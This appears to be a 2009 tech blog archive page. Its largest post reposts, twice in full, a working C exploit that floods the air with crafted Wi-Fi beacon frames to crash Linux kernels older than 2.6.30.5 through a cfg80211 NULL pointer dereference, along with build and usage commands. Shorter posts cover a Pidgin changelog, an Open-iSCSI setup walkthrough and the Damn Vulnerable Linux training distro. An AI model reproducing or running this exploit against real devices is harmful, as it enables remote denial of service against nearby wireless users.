Posted: August 18th, 2009 | Author: xanda | Filed under: IT Related | Tags: 2.6.30.5, exploit, kernel, linux, remote | No Comments »
In case you guys haven’t notice about this vulnerability
/*
* cfg80211-remote-dos.c
*
* Linux Kernel < 2.6.30.5 cfg80211 Remote DoS
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://patchwork.kernel.org/patch/41218/
*
* These pointers can be NULL, the is_mesh() case isn't ever hit in the
* current kernel, but cmp_ies() can be hit under certain conditions.
*
* Usage:
*
* $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon
* $ airmon-ng start wlan0
* ...
* $ ./cfg80211-remote-dos mon0 mac80211
* [+] Initializing interface mon0...
* [+] Injecting crafted DoS beacon frames...
*
* Notes:
*
* The NULL pointer dereference is triggered if the victim scans and receives
* a beacon frame that does not contain a SSID IE and then receives another
* one that does have a SSID IE. Raw frame injection via LORCON is required
* on the wireless interface. This should only affect the 2.6.30 series.
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
#include <tx80211.h>
#include <tx80211_packet.h>
#define BEACON_NOSSID \
"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
"\x00\x03\x52\x00\x00\x00" \
"\x00\x03\x52\x00\x00\x00" \
"\x30\x4b" \
"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
"\x03\x01\x07" \
"\x05\x04\x00\x01\x01\x00" \
"\x2a\x01\x04" \
"\x32\x04\x30\x48\x60\x6c"
#define BEACON_NOSSID_LEN 64
#define BEACON_SSID \
"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
"\x00\x03\x52\x00\x00\x00" \
"\x00\x03\x52\x00\x00\x00" \
"\x30\x4b" \
"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
"\x00\x03\x44\x6f\x53" \
"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
"\x03\x01\x07" \
"\x05\x04\x00\x01\x01\x00" \
"\x2a\x01\x04" \
"\x32\x04\x30\x48\x60\x6c"
#define BEACON_SSID_LEN 69
void
usage(char **argv)
{
int i;
struct tx80211_cardlist *cardlist;
printf("Usage: %s [interface] [drivername]\n", argv[0]);
cardlist = tx80211_getcardlist();
if (cardlist == NULL) {
printf("Error accessing supported cardlist.\n");
} else {
printf("\nSupported drivers are: ");
for (i = 1; i < cardlist->num_cards; i++) {
printf("%s ", cardlist->cardnames[i]);
}
printf("\n");
}
tx80211_freecardlist(cardlist);
}
int
main(int argc, char **argv)
{
struct tx80211 tx;
struct tx80211_packet pkt;
char p1[BEACON_NOSSID_LEN];
char p2[BEACON_SSID_LEN];
int ret, drivertype;
uint8_t randbyte;
if (argc < 3) {
usage(argv);
return 0;
}
printf("[+] Initializing interface %s...\n", argv[1]);
drivertype = tx80211_resolvecard(argv[2]);
if (drivertype == INJ_NODRIVER) {
printf("[-] Driver name not recognized.\n");
exit(1);
}
ret = tx80211_init(&tx, argv[1], drivertype);
if (ret < 0) {
printf("[-] Error initializing %s/%s", argv[1], argv[2]);
exit(1);
}
ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
if (ret != 0) {
printf("[-] Error setting monitor mode.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_setchannel(&tx, 11);
if (ret < 0) {
printf("[-] Error setting channel.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_open(&tx);
if (ret < 0) {
printf("[-] Unable to open interface %s\n", tx.ifname);
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
srand(time(NULL));
memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
printf("[+] Injecting crafted DoS beacon frames...\n");
while (1) {
randbyte = rand() & 0xff;
p1[15] = randbyte;
p1[21] = randbyte;
p2[15] = randbyte;
p2[21] = randbyte;
pkt.packet = p1;
pkt.plen = BEACON_NOSSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
pkt.packet = p2;
pkt.plen = BEACON_SSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
}
tx80211_close(&tx);
return 0;
} |
/*
* cfg80211-remote-dos.c
*
* Linux Kernel < 2.6.30.5 cfg80211 Remote DoS
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://patchwork.kernel.org/patch/41218/
*
* These pointers can be NULL, the is_mesh() case isn't ever hit in the
* current kernel, but cmp_ies() can be hit under certain conditions.
*
* Usage:
*
* $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon
* $ airmon-ng start wlan0
* ...
* $ ./cfg80211-remote-dos mon0 mac80211
* [+] Initializing interface mon0...
* [+] Injecting crafted DoS beacon frames...
*
* Notes:
*
* The NULL pointer dereference is triggered if the victim scans and receives
* a beacon frame that does not contain a SSID IE and then receives another
* one that does have a SSID IE. Raw frame injection via LORCON is required
* on the wireless interface. This should only affect the 2.6.30 series.
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
#include <tx80211.h>
#include <tx80211_packet.h>
#define BEACON_NOSSID \
"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
"\x00\x03\x52\x00\x00\x00" \
"\x00\x03\x52\x00\x00\x00" \
"\x30\x4b" \
"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
"\x03\x01\x07" \
"\x05\x04\x00\x01\x01\x00" \
"\x2a\x01\x04" \
"\x32\x04\x30\x48\x60\x6c"
#define BEACON_NOSSID_LEN 64
#define BEACON_SSID \
"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
"\x00\x03\x52\x00\x00\x00" \
"\x00\x03\x52\x00\x00\x00" \
"\x30\x4b" \
"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
"\x00\x03\x44\x6f\x53" \
"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
"\x03\x01\x07" \
"\x05\x04\x00\x01\x01\x00" \
"\x2a\x01\x04" \
"\x32\x04\x30\x48\x60\x6c"
#define BEACON_SSID_LEN 69
void
usage(char **argv)
{
int i;
struct tx80211_cardlist *cardlist;
printf("Usage: %s [interface] [drivername]\n", argv[0]);
cardlist = tx80211_getcardlist();
if (cardlist == NULL) {
printf("Error accessing supported cardlist.\n");
} else {
printf("\nSupported drivers are: ");
for (i = 1; i < cardlist->num_cards; i++) {
printf("%s ", cardlist->cardnames[i]);
}
printf("\n");
}
tx80211_freecardlist(cardlist);
}
int
main(int argc, char **argv)
{
struct tx80211 tx;
struct tx80211_packet pkt;
char p1[BEACON_NOSSID_LEN];
char p2[BEACON_SSID_LEN];
int ret, drivertype;
uint8_t randbyte;
if (argc < 3) {
usage(argv);
return 0;
}
printf("[+] Initializing interface %s...\n", argv[1]);
drivertype = tx80211_resolvecard(argv[2]);
if (drivertype == INJ_NODRIVER) {
printf("[-] Driver name not recognized.\n");
exit(1);
}
ret = tx80211_init(&tx, argv[1], drivertype);
if (ret < 0) {
printf("[-] Error initializing %s/%s", argv[1], argv[2]);
exit(1);
}
ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
if (ret != 0) {
printf("[-] Error setting monitor mode.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_setchannel(&tx, 11);
if (ret < 0) {
printf("[-] Error setting channel.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_open(&tx);
if (ret < 0) {
printf("[-] Unable to open interface %s\n", tx.ifname);
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
srand(time(NULL));
memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
printf("[+] Injecting crafted DoS beacon frames...\n");
while (1) {
randbyte = rand() & 0xff;
p1[15] = randbyte;
p1[21] = randbyte;
p2[15] = randbyte;
p2[21] = randbyte;
pkt.packet = p1;
pkt.plen = BEACON_NOSSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
pkt.packet = p2;
pkt.plen = BEACON_SSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
}
tx80211_close(&tx);
return 0;
}
Source: Milw0rm
Posted: June 24th, 2009 | Author: xanda | Filed under: IT Related | Tags: linux, pidgin, yahoo messenger | 2 Comments »
Download
[If you plan to compile it yourself, please refer HERE]
Change log:
- Yahoo Protocol 16 support, including new HTTPS login method; this should fix a number of login problems that have recently cropped up. (Sulabh Mahajan, Mike “Maiku” Ruprecht)
- Only display the AIM “Unable to Retrieve Buddy List” message once per connection. (Rob Taft)
- Blocking MSN users not on your buddy list no longer disconnects you.
- When performing operations on MSN, assume users are on the MSN/Passport network if we don’t get network ID’s for them.
Posted: April 28th, 2009 | Author: xanda | Filed under: IT Related | Tags: iSCSI, iSCSI Initiator, linux, ubuntu | No Comments »
This is not the first time I deal with SAN device but I never use it with Ubuntu Linux before. Anyway, there is first time for everything.
After 15 minutes playing around with Open-iSCSI (it can be done in just a few seconds in Windows by using GUI based iSCSI Initiator), here is the howto (and at the same time as a note for myself)
1) Install Open-iSCSI Initiator
sudo apt-get install open-iscsi |
sudo apt-get install open-iscsi
2) If you want your computer manually connect to the SAN volume, proceed with step 3. But if you want your computer automatically connect to the volume, edit the iscsid configurtation file
sudo nano /etc/iscsi/iscsid.conf |
sudo nano /etc/iscsi/iscsid.conf
And change the following parameters
- isns.address = SAN-IP-ADDRESS-HERE
- isns.port = 3260
3) If the restriction is based on IP (without password) procees with step 4. But if password is required, edit the iscsid configurtation file
sudo nano /etc/iscsi/iscsid.conf |
sudo nano /etc/iscsi/iscsid.conf
And change/set the following parameters
- node.session.auth.username = USER
- node.session.auth.password = PASSWORD
- discovery.sendtargets.auth.username = USER
- discovery.sendtargets.auth.password = PASSWORD
4) Restart the open-iscsi service
sudo /etc/init.d/open-iscsi restart |
sudo /etc/init.d/open-iscsi restart
5) Run open-iscsi administration utility with root privilege to discover available volume
sudo iscsiadm -m discovery -t sendtargets -p 192.168.10.1 |
sudo iscsiadm -m discovery -t sendtargets -p 192.168.10.1
where 192.168.10.1 is the IP of your SAN. If your configuration is working, you will get something similar to this :-
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-f260b4603-e8b0000001249f55-vss-control
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-6980b4603-a990000001f49f56-csmvol3
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-58c0b4603-1730000001c49f56-csmvol2
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1 |
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-f260b4603-e8b0000001249f55-vss-control
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-6980b4603-a990000001f49f56-csmvol3
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-58c0b4603-1730000001c49f56-csmvol2
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1
6) In this case, I want to connect to volume 1 (iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1), so here is what I should do
sudo iscsiadm --mode node --targetname iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1 --portal 192.168.10.1:3260 --login |
sudo iscsiadm --mode node --targetname iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1 --portal 192.168.10.1:3260 --login
And if you are successfully connected, you’ll get the following message
Logging in to [iface: default, target: iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1, portal: 192.168.10.1,3260]
Login to [iface: default, target: iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1, portal: 192.168.10.1,3260]: successful |
Logging in to [iface: default, target: iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1, portal: 192.168.10.1,3260]
Login to [iface: default, target: iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1, portal: 192.168.10.1,3260]: successful
7) Now, verify the device name that has been connected to your machine
tail -f /var/log/messages |
tail -f /var/log/messages
And in my case, this is my output
Apr 28 09:42:48 xps kernel: [ 2514.014658] scsi 6:0:0:0: Direct-Access EQLOGIC 100E-00 4.0 PQ: 0 ANSI: 5
Apr 28 09:42:48 xps kernel: [ 2514.016499] sd 6:0:0:0: [sdb] 209725440 512-byte hardware sectors: (107 GB/100 GiB)
Apr 28 09:42:48 xps kernel: [ 2514.017832] sd 6:0:0:0: [sdb] Write Protect is off
Apr 28 09:42:48 xps kernel: [ 2514.018256] sd 6:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
Apr 28 09:42:48 xps kernel: [ 2514.019240] sd 6:0:0:0: [sdb] 209725440 512-byte hardware sectors: (107 GB/100 GiB)
Apr 28 09:42:48 xps kernel: [ 2514.019434] sd 6:0:0:0: [sdb] Write Protect is off
Apr 28 09:42:48 xps kernel: [ 2514.019836] sd 6:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
Apr 28 09:42:48 xps kernel: [ 2514.019842] sdb: sdb1
Apr 28 09:42:48 xps kernel: [ 2514.024882] sd 6:0:0:0: [sdb] Attached SCSI disk
Apr 28 09:42:48 xps kernel: [ 2514.026039] sd 6:0:0:0: Attached scsi generic sg2 type 0 |
Apr 28 09:42:48 xps kernel: [ 2514.014658] scsi 6:0:0:0: Direct-Access EQLOGIC 100E-00 4.0 PQ: 0 ANSI: 5
Apr 28 09:42:48 xps kernel: [ 2514.016499] sd 6:0:0:0: [sdb] 209725440 512-byte hardware sectors: (107 GB/100 GiB)
Apr 28 09:42:48 xps kernel: [ 2514.017832] sd 6:0:0:0: [sdb] Write Protect is off
Apr 28 09:42:48 xps kernel: [ 2514.018256] sd 6:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
Apr 28 09:42:48 xps kernel: [ 2514.019240] sd 6:0:0:0: [sdb] 209725440 512-byte hardware sectors: (107 GB/100 GiB)
Apr 28 09:42:48 xps kernel: [ 2514.019434] sd 6:0:0:0: [sdb] Write Protect is off
Apr 28 09:42:48 xps kernel: [ 2514.019836] sd 6:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
Apr 28 09:42:48 xps kernel: [ 2514.019842] sdb: sdb1
Apr 28 09:42:48 xps kernel: [ 2514.024882] sd 6:0:0:0: [sdb] Attached SCSI disk
Apr 28 09:42:48 xps kernel: [ 2514.026039] sd 6:0:0:0: Attached scsi generic sg2 type 0
The connected volume appear to be as SDB in my machine
8 ) If the volume already contain partition and already formated, you can straight away mount them, but if they dont have partition and filesystem yet, you can either use fdisk or gparted to create the partition and format them 😉
Enjoy..!~
Demo for fdisk -l output
Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x12961295
Device Boot Start End Blocks Id System
/dev/sda1 1 12 96358+ de Dell Utility
/dev/sda2 * 13 7661 61440592+ 7 HPFS/NTFS
/dev/sda3 7662 11396 30001387+ b W95 FAT32
/dev/sda4 11397 19457 64749982+ 5 Extended
/dev/sda5 11397 11520 995998+ 82 Linux swap / Solaris
/dev/sda6 11521 19457 63753921 83 Linux
Disk /dev/sdb: 107.3 GB, 107379425280 bytes
255 heads, 63 sectors/track, 13054 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x00093e08
Device Boot Start End Blocks Id System
/dev/sdb1 1 13054 104856223+ 83 Linux |
Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x12961295
Device Boot Start End Blocks Id System
/dev/sda1 1 12 96358+ de Dell Utility
/dev/sda2 * 13 7661 61440592+ 7 HPFS/NTFS
/dev/sda3 7662 11396 30001387+ b W95 FAT32
/dev/sda4 11397 19457 64749982+ 5 Extended
/dev/sda5 11397 11520 995998+ 82 Linux swap / Solaris
/dev/sda6 11521 19457 63753921 83 Linux
Disk /dev/sdb: 107.3 GB, 107379425280 bytes
255 heads, 63 sectors/track, 13054 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x00093e08
Device Boot Start End Blocks Id System
/dev/sdb1 1 13054 104856223+ 83 Linux
[Reference: Cyberciti & Ubuntu Forum]
Posted: March 10th, 2009 | Author: xanda | Filed under: IT Related | Tags: linux, secure, security, vulnerable | No Comments »
Damn Vulnerable Linux (DVL) is a Slackware and Slax-based live DVD purposefully stuffed with broken, ill-configured, outdated and exploitable software, began life as a training system used during the author’s university lectures.
Its primary goal is to design a Linux system that is as vulnerable as possible — in order to teach and demonstrate a variety of security topics, including reverse code engineering, buffer overflows, shell code development, web exploitation, and SQL injection.
It contains older, easily breakable versions of Apache, MySQL, PHP, and FTP and SSH daemons, as well as several tools available to help you compile, debug, and break applications running on these services, including GCC, GDB, NASM, strace, ELF Shell, DDD, LDasm, LIDa, and more.
So if you are looking for a new playground, DVL is a good choice for you.